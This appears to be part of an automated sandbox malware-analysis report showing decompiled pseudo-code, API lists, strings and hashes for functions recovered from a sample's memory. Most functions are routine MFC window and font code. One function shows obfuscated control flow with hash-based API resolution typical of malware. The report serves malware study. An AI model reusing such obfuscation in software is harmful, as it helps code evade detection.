					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t147 - 0x20)) == 8) {
							 *((intOrPtr*)(_t147 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t147 - 0x34);
				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
				goto L5;
			}

APIs

__EH_prolog.LIBCMT ref: 00411E37
GetSystemMetrics.USER32 ref: 00411EE9
GlobalLock.KERNEL32 ref: 00411F73
CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
GlobalFree.KERNEL32 ref: 00412036

Strings

MS Sans Serif, xrefs: 00411F0A
Helv, xrefs: 00411F1D
MS Shell Dlg, xrefs: 00411EF7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 02279FA0, Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02279FA0(char* __ecx, intOrPtr __edx) {
				char _v524;
				char _v1044;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				intOrPtr* _v1068;
				intOrPtr _v1072;
				char* _v1076;
				intOrPtr _v1080;
				intOrPtr* _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1108;
				intOrPtr _v1112;
				void* __ebx;
				void* __ebp;
				void* _t39;
				signed int _t40;
				intOrPtr* _t43;
				signed int _t46;
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr* _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t97;
				intOrPtr _t98;
				char* _t99;
				intOrPtr _t100;
				intOrPtr _t134;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				char* _t152;
				void* _t153;
				char _t155;
				intOrPtr _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t99 = __ecx;
				_t157 =  &_v1084;
				_v1080 = __edx;
				_v1076 = __ecx;
				_t39 = 0x1a29c84b;
				while(1) {
					L1:
					_t97 = _v1068;
					while(1) {
						_t155 = _v1064;
						do {
							while(1) {
								L3:
								_t158 = _t39 - 0x1bec2acf;
								if(_t158 > 0) {
									break;
								}
								if(_t158 == 0) {
									_t56 =  *0x227dea8;
									__eflags = _t56;
									if(_t56 == 0) {
										_t99 = E02273F20(0xbb398380);
										_t56 = E02273E80(_t97, _t99, 0x97f883e, _t155);
										 *0x227dea8 = _t56;
									}
									_t146 =  *_t56();
									_t58 =  *0x227e1a0;
									__eflags = _t58;
									if(_t58 == 0) {
										_t99 = E02273F20(0xbb398380);
										_t58 = E02273E80(_t97, _t99, 0x26c3f343, _t155);
										 *0x227e1a0 = _t58;
									}
									 *_t58(_t146, 0, _t97);
									_t147 = _v1088;
									_t39 = 0x1dedf83c;
									continue;
								} else {
									_t159 = _t39 - 0x191840a9;
									if(_t159 > 0) {
										__eflags = _t39 - 0x1a29c84b;
										if(_t39 == 0x1a29c84b) {
											_t62 =  *0x227dea8;
											__eflags = _t62;
											if(_t62 == 0) {
												_t99 = E02273F20(0xbb398380);
												_t62 = E02273E80(_t97, _t99, 0x97f883e, _t155);
												 *0x227dea8 = _t62;
											}
											_t148 =  *_t62();
											_t64 =  *0x227dcec;
											__eflags = _t64;
											if(_t64 == 0) {
												_t99 = E02273F20(0xbb398380);
												_t64 = E02273E80(_t97, _t99, 0xe9233692, _t155);
												 *0x227dcec = _t64;
											}
											_t65 =  *_t64(_t148, 8, 0x48);
											_v1084 = _t65;
											__eflags = _t65;
											if(_t65 == 0) {
												return _t65;
											} else {
												_t147 = _v1088;
												_t39 = 0x1fc710ef;
												continue;
											}
										} else {
											__eflags = _t39 - 0x1a44b2a5;
											if(_t39 != 0x1a44b2a5) {
												goto L45;
											} else {
												_t152 = E022734C0(0x227da50);
												_t69 =  *0x227dc60;
												__eflags = _t69;
												if(_t69 == 0) {
													_t69 = E02273E80(_t97, E02273F20(0xe66945e6), 0xcca28b0d, _t155);
													 *0x227dc60 = _t69;
												}
												 *_t69( &_v1044, 0x104, _t152,  &_v524, _t97);
												_t157 = _t157 + 0x14;
												_t99 = _t152;
												E02273460(_t99);
												_t147 = _v1076;
												_t39 = 0x10f8a433;
												continue;
											}
										}
									} else {
										if(_t159 == 0) {
											_t100 = _v1072;
											 *((intOrPtr*)(_t100 + 0x24)) = _t147;
											_t73 =  *0x227e2dc; // 0x0
											 *((intOrPtr*)(_t100 + 0x20)) = _t73;
											 *0x227e2dc = _t100;
											return _t73;
										} else {
											if(_t39 == 0xa70e03e) {
												_t74 =  *0x227dc70;
												__eflags = _t74;
												if(_t74 == 0) {
													_t99 = E02273F20(0xbb398380);
													_t74 = E02273E80(_t97, _t99, 0x560d239b, _t155);
													 *0x227dc70 = _t74;
												}
												 *_t74(_v1056);
												_t39 = 0x191840a9;
												continue;
											} else {
												if(_t39 == 0x10f8a433) {
													_push(0);
													_push(_t99);
													_t99 = 0;
													E02274BA0(_t97, 0,  &_v1044, _t155, 1);
													_t157 = _t157 + 0xc;
													_t39 = 0x1bec2acf;
													continue;
												} else {
													if(_t39 != 0x18d473c5) {
														goto L45;
													} else {
														_t149 =  *0x227e2ec; // 0x4d9470
														_t78 =  *0x227e024;
														_t150 = _t149 + 0x278;
														_v1052 = _t150;
														if(_t78 == 0) {
															_t99 = E02273F20(0xbb398380);
															_t78 = E02273E80(_t97, _t99, 0x5262aefc, _t155);
															 *0x227e024 = _t78;
														}
														_t79 =  *_t78(_t150);
														_t151 =  *0x227ded0;
														_v1052 = 2 + _t79 * 2;
														if(_t151 == 0) {
															_t99 = E02273F20(0xbb398380);
															_t151 = E02273E80(_t97, _t99, 0x23563937, _t155);
															 *0x227ded0 = _t151;
														}
														_t156 = _t151;
														if(_t151 == 0) {
															_t99 = E02273F20(0xbb398380);
															_t151 = E02273E80(_t97, _t99, 0x23563937, _t156);
															 *0x227ded0 = _t151;
														}
														_t98 = _t151;
														if(_t151 == 0) {
															_t99 = E02273F20(0xbb398380);
															 *0x227ded0 = E02273E80(_t98, _t99, 0x23563937, _t156);
														}
														_t144 =  *0x227dce8; // 0x0
														if(_t144 == 0) {
															_t99 = E02273F20(0xbb398380);
															_t144 = E02273E80(_t98, _t99, 0xb310a228, _t156);
															 *0x227dce8 = _t144;
														}
														_t85 =  *_t144(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
														_t147 = _v1108;
														_t134 = _v1112;
														asm("sbb eax, eax");
														_t39 = ( ~_t85 & 0x069deb97) + 0x1f9eb481;
														goto L1;
													}
												}
											}
										}
									}
								}
								L60:
							}
							__eflags = _t39 - 0x1fc710ef;
							if(__eflags > 0) {
								__eflags = _t39 - 0x263ca018;
								if(_t39 == 0x263ca018) {
									_t99 =  &_v1056;
									_t40 = E0227B3A0(_t99,  &_v1064);
									asm("sbb eax, eax");
									_t39 = ( ~_t40 & 0x28f9ad68) + 0xa70e03e;
									_t155 = _v1064;
									goto L3;
								} else {
									__eflags = _t39 - 0x336a8da6;
									if(_t39 != 0x336a8da6) {
										goto L45;
									} else {
										_t99 = _t155;
										_t43 = E02271140(_v1060);
										_t134 = _v1080;
										_t97 = _t43;
										__eflags = _t97;
										_v1068 = _t97;
										_t39 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
										goto L3;
									}
								}
							} else {
								if(__eflags == 0) {
									_t99 = _t147;
									_t46 = E0227AB50(_t99, _t134,  &_v524);
									_t134 = _v1080;
									_t157 = _t157 + 4;
									asm("sbb eax, eax");
									_t39 = ( ~_t46 & 0xf935bf44) + 0x1f9eb481;
									goto L3;
								} else {
									__eflags = _t39 - 0x1dedf83c;
									if(_t39 == 0x1dedf83c) {
										_t49 =  *0x227dea8;
										__eflags = _t49;
										if(_t49 == 0) {
											_t99 = E02273F20(0xbb398380);
											_t49 = E02273E80(_t97, _t99, 0x97f883e, _t155);
											 *0x227dea8 = _t49;
										}
										_t153 =  *_t49();
										_t51 =  *0x227e1a0;
										__eflags = _t51;
										if(_t51 == 0) {
											_t99 = E02273F20(0xbb398380);
											_t51 = E02273E80(_t97, _t99, 0x26c3f343, _t155);
											 *0x227e1a0 = _t51;
										}
										 *_t51(_t153, 0, _t155);
										_t147 = _v1088;
										_t39 = 0xa70e03e;
										_t134 = _v1092;
										goto L3;
									} else {
										__eflags = _t39 - 0x1f9eb481;
										if(_t39 == 0x1f9eb481) {
											return E02274250(_t97, _v1072);
										}
										goto L45;
									}
								}
							}
							goto L60;
							L45:
							__eflags = _t39 - 0x1c40b504;
						} while (_t39 != 0x1c40b504);
						return _t39;
						goto L60;
					}
				}
			}

0x02279fa0
0x02279fa0
0x02279fab
0x02279fb0
0x02279fb4
0x02279fb9
0x02279fb9
0x02279fb9
0x02279fc2
0x02279fc2
0x02279fd0
0x02279fd0
0x02279fd0
0x02279fd0
0x02279fd5
0x00000000
0x00000000
0x02279fdb
0x0227a25f
0x0227a264
0x0227a266
0x0227a277
0x0227a279
0x0227a27e
0x0227a27e
0x0227a285
0x0227a287
0x0227a28c
0x0227a28e
0x0227a29f
0x0227a2a1
0x0227a2a6
0x0227a2a6
0x0227a2af
0x0227a2b1
0x0227a2b5
0x00000000
0x02279fe1
0x02279fe1
0x02279fe6
0x0227a17a
0x0227a17f
0x0227a1ee
0x0227a1f3
0x0227a1f5
0x0227a206
0x0227a208
0x0227a20d
0x0227a20d
0x0227a214
0x0227a216
0x0227a21b
0x0227a21d
0x0227a22e
0x0227a230
0x0227a235
0x0227a235
0x0227a23f
0x0227a241
0x0227a245
0x0227a247
0x0227a416
0x0227a24d
0x0227a24d
0x0227a251
0x00000000
0x0227a256
0x0227a181
0x0227a181
0x0227a186
0x00000000
0x0227a18c
0x0227a196
0x0227a198
0x0227a19d
0x0227a19f
0x0227a1b2
0x0227a1b7
0x0227a1b7
0x0227a1d0
0x0227a1d2
0x0227a1d5
0x0227a1d7
0x0227a1dc
0x0227a1e0
0x00000000
0x0227a1e5
0x0227a186
0x02279fec
0x02279fec
0x0227a3e3
0x0227a3e7
0x0227a3ea
0x0227a3ef
0x0227a3f2
0x0227a402
0x02279ff2
0x02279ff7
0x0227a142
0x0227a147
0x0227a149
0x0227a15a
0x0227a15c
0x0227a161
0x0227a161
0x0227a16a
0x0227a170
0x00000000
0x02279ffd
0x0227a002
0x0227a121
0x0227a123
0x0227a12a
0x0227a12c
0x0227a135
0x0227a138
0x00000000
0x0227a008
0x0227a00d
0x00000000
0x0227a013
0x0227a013
0x0227a019
0x0227a01e
0x0227a024
0x0227a02a
0x0227a03b
0x0227a03d
0x0227a042
0x0227a042
0x0227a048
0x0227a04a
0x0227a057
0x0227a05d
0x0227a06e
0x0227a075
0x0227a077
0x0227a077
0x0227a07d
0x0227a081
0x0227a092
0x0227a099
0x0227a09b
0x0227a09b
0x0227a0a1
0x0227a0a5
0x0227a0b6
0x0227a0bf
0x0227a0bf
0x0227a0c5
0x0227a0cd
0x0227a0de
0x0227a0e5
0x0227a0e7
0x0227a0e7
0x0227a104
0x0227a106
0x0227a10c
0x0227a110
0x0227a117
0x00000000
0x0227a117
0x0227a00d
0x0227a002
0x02279ff7
0x02279fec
0x02279fe6
0x00000000
0x02279fdb
0x0227a2c3
0x0227a2c8
0x0227a389
0x0227a38e
0x0227a3c3
0x0227a3c7
0x0227a3d2
0x0227a3d9
0x02279fc2
0x00000000
0x0227a390
0x0227a390
0x0227a395
0x00000000
0x0227a39b
0x0227a39f
0x0227a3a1
0x0227a3a6
0x0227a3aa
0x0227a3ac
0x0227a3ae
0x0227a3b7
0x00000000
0x0227a3b7
0x0227a395
0x0227a2ce
0x0227a2ce
0x0227a367
0x0227a36a
0x0227a36f
0x0227a373
0x0227a378
0x0227a37f
0x00000000
0x0227a2d4
0x0227a2d4
0x0227a2d9
0x0227a2fc
0x0227a301
0x0227a303
0x0227a314
0x0227a316
0x0227a31b
0x0227a31b
0x0227a322
0x0227a324
0x0227a329
0x0227a32b
0x0227a33c
0x0227a33e
0x0227a343
0x0227a343
0x0227a34c
0x0227a34e
0x0227a352
0x0227a357
0x00000000
0x0227a2db
0x0227a2db
0x0227a2e0
0x00000000
0x0227a407
0x00000000
0x0227a2e0
0x0227a2d9
0x0227a2ce
0x00000000
0x0227a2e6
0x0227a2e6
0x0227a2e6
0x0227a2fb
0x00000000
0x0227a2fb
0x02279fc2

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0227A0FB
GetCurrentProcess.KERNEL32(00000000), ref: 0227A0FE
GetCurrentProcess.KERNEL32(00000000), ref: 0227A101

Strings

79V#, xrefs: 0227A0B1
79V#, xrefs: 0227A069
79V#, xrefs: 0227A08D
>p, xrefs: 02279FF2
>p, xrefs: 0227A352
Ei, xrefs: 0227A1A1

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p$>p$Ei
API String ID: 2050909247-1771473519
Opcode ID: 55b299126aa161881efe7b4188e1bf3016a433c468dc1c1704971d2bb4b37640
Instruction ID: 9446f566a317bad02e6a75d5a657cfff71d8cdaefdb0e04edefc1b0661e474a6
Opcode Fuzzy Hash: 55b299126aa161881efe7b4188e1bf3016a433c468dc1c1704971d2bb4b37640
Instruction Fuzzy Hash: 94A1DE71B6C3029BCB14EAF8A89462F32E6ABC4694F540869F445DB348EF74DC058BD3

Uniqueness

Uniqueness Score: -1.00%

Function 0041D196, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				signed int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				char _v304;
				void* __ebp;
				int _t69;
				signed char _t72;
				signed char _t77;
				signed int _t82;
				signed int _t84;
				void* _t90;
				struct HWND__* _t94;
				intOrPtr _t122;
				intOrPtr _t130;
				void* _t142;
				signed char _t143;
				signed char _t145;
				intOrPtr _t147;
				void* _t149;

				_t142 = __edx;
				_t147 = _a4;
				_t122 = __ecx;
				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
					_t143 = 0;
					__eflags = 0;
					L5:
					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
					}
					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
					 *(_t122 + 0x64) = _t72;
					if((_t72 & 0x00000040) == 0) {
						E004165E5(_t147,  &_v304, 0x104);
						E0041A843( *(_t122 + 0x1c),  &_v304);
					}
					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
						_t78 = _t77 & 0x000000fe;
						__eflags = _t77 & 0x000000fe;
					} else {
						_t78 = _t77 | 0x00000001;
					}
					E004263C3(_t147, _t78);
					_v28 = _t143;
					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
						_v28 = 1;
					}
					_v24 = _v24 | 0xffffffff;
					if(_a8 == _t143) {
						_t144 = _t122 + 0x7c;
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
						_t82 =  *0x439bf4; // 0x2
						_t145 = 0;
						__eflags = 0;
						_t84 =  *0x439bf0; // 0x2
						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t122,  &_v20);
						asm("cdq");
						_t40 =  &(_v20.bottom); // 0x50402834
						asm("cdq");
						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
						asm("movsd");
						asm("movsd");
						_push(_a4);
						asm("movsd");
						asm("movsd");
						_v24 = E0041DD44(_t122);
						_t46 =  &(_v20.bottom); // 0x50402834
						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
						_t147 = _a4;
						_t145 = 0;
					}
					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
						if(_t122 != _t145) {
							_t94 =  *(_t122 + 0x1c);
						} else {
							_t94 = 0;
						}
						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
					}
					_t130 =  *((intOrPtr*)(_t147 + 0x70));
					_t165 = _t130 - _t122;
					if(_t130 != _t122) {
						__eflags = _t130 - _t145;
						if(_t130 == _t145) {
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
							L30:
							__eflags = 0;
							L31:
							_push(0);
							_push(0xffffffff);
							goto L32;
						}
						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
						if(__eflags != 0) {
							goto L30;
						}
						_push(1);
						_pop(0);
						goto L31;
					} else {
						_push(_t145);
						_push(_v24);
						L32:
						_push(_t147);
						E0041D609(_t130, _t165);
						L33:
						_t166 = _v28 - _t145;
						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
						if(_v28 != _t145) {
							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
						}
						E0041D5A8(_t122, _t147);
						_t90 = E004225AA(_t122, _t166);
						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
						return _t90;
					}
				}
				_t143 = 0;
				if(_a8 != 0) {
					_t69 = EqualRect( &_v44, _a8);
					if(_t69 == 0) {
						goto L5;
					}
				}
				return _t69;
			}

APIs

GetWindowRect.USER32 ref: 0041D1AE
EqualRect.USER32 ref: 0041D1CB

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

IsWindowVisible.USER32(?), ref: 0041D254
CopyRect.USER32 ref: 0041D286
GetParent.USER32(?), ref: 0041D338
SetParent.USER32(?,0000E800,00000000), ref: 0041D357

Strings

@m7@, xrefs: 0041D227, 0041D1F3
@, xrefs: 0041D1E8
4(@P, xrefs: 0041D2A5, 0041D2D0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: 4(@P$@$@m7@
API String ID: 3103310903-421610842
Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00413821, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413821(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00406520(E00429E08, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E00413740(_t75,  *(_t75 + 0x14));
					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
							} else {
								_t74 = E00413740(_t75, _t68);
								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E0041342F(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

APIs

__EH_prolog.LIBCMT ref: 00413826
GetPropA.USER32 ref: 0041383E
CallWindowProcA.USER32 ref: 0041389C

Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471

SetWindowLongA.USER32 ref: 004138CC
RemovePropA.USER32 ref: 004138D4
GlobalFindAtomA.KERNEL32 ref: 004138DB
GlobalDeleteAtom.KERNEL32 ref: 004138E2

Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418

CallWindowProcA.USER32 ref: 00413936

Strings

AfxOldWndProc423, xrefs: 00413834, 0041383C, 004138D2, 004138DA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004251B9, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251B9() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x436880; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x436880; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x004251b9
0x004251c1
0x004251e8
0x004251fd
0x00425201
0x00425207
0x00425207
0x00425213
0x0042521b
0x0042521f
0x00425222
0x00425222
0x0042522a
0x00425230
0x00000000
0x00425238
0x00425239

APIs

GetDC.USER32(00000000), ref: 004251CA
GetSystemMetrics.USER32 ref: 004251EA
CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
SelectObject.GDI32(00000000,00000000), ref: 00425205
GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
SelectObject.GDI32(00000000,00000000), ref: 0042521F
DeleteObject.GDI32(00000000), ref: 00425222
ReleaseDC.USER32 ref: 0042522A

Strings

Marlett, xrefs: 004251D0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0, Relevance: 15.4, APIs: 10, Instructions: 418
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
